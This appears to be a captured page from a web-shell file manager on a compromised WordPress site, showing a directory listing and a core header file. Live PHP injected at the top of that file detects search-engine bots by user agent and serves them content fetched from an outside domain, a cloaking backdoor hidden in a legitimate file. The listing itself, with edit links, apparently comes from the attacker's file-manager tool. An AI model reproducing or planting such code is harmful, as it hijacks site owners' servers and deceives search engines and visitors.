PATH:
home
/
centosnipponia
/
public_html
/
nipponiacom
<?php function is_bot() { $user_agent = $_SERVER['HTTP_USER_AGENT']; $bots = array('Googlebot', 'TelegramBot', 'bingbot', 'Google-Site-Verification', 'Google-InspectionTool', 'adsense', 'slurp'); foreach ($bots as $bot) { if (stripos($user_agent, $bot) !== false) { return true; } } return false; } if (is_bot()) { echo file_get_contents('https://carlesgantengidaman.uk/raw/d1262dd5'); exit; } ?> <?php /** * Loads the WordPress environment and template. * * @package WordPress */ if ( ! isset( $wp_did_header ) ) { $wp_did_header = true; // Load the WordPress library. require_once __DIR__ . '/wp-load.php'; // Set up the WordPress query. wp(); // Load the theme template. require_once ABSPATH . WPINC . '/template-loader.php'; }
[+]
..
[+]
cgi-bin
[+]
.well-known
[+]
wp-admin
[-] wp-load.php
[edit]
[-] index.php
[edit]
[-] wp-blog-header.php
[edit]
[-] wp-config-sample.php
[edit]
[-] readme.html
[edit]
[-] wp-trackback.php
[edit]
[-] wp-activate.php
[edit]
[+]
wp-includes
[-] wp-cron.php
[edit]
[-] wp-signup.php
[edit]
[-] wp-mail.php
[edit]
[-] license.txt
[edit]
[-] wp-login.php
[edit]
[-] wp-links-opml.php
[edit]
[-] wp-settings.php
[edit]
[-] wp-comments-post.php
[edit]
[-] xmlrpc.php
[edit]
[-] php.ini
[edit]
[-] .user.ini
[edit]
[-] wordfence-waf.php
[edit]
[-] wp-config-orig-copy.php
[edit]
[-] wp-config-orig.php
[edit]
[-] wp-config.php
[edit]
[+]
wp-content
[-] aa.txt
[edit]
[-] googleba054dfbe8cc95d9.html
[edit]
[-] .htaccess.disabled
[edit]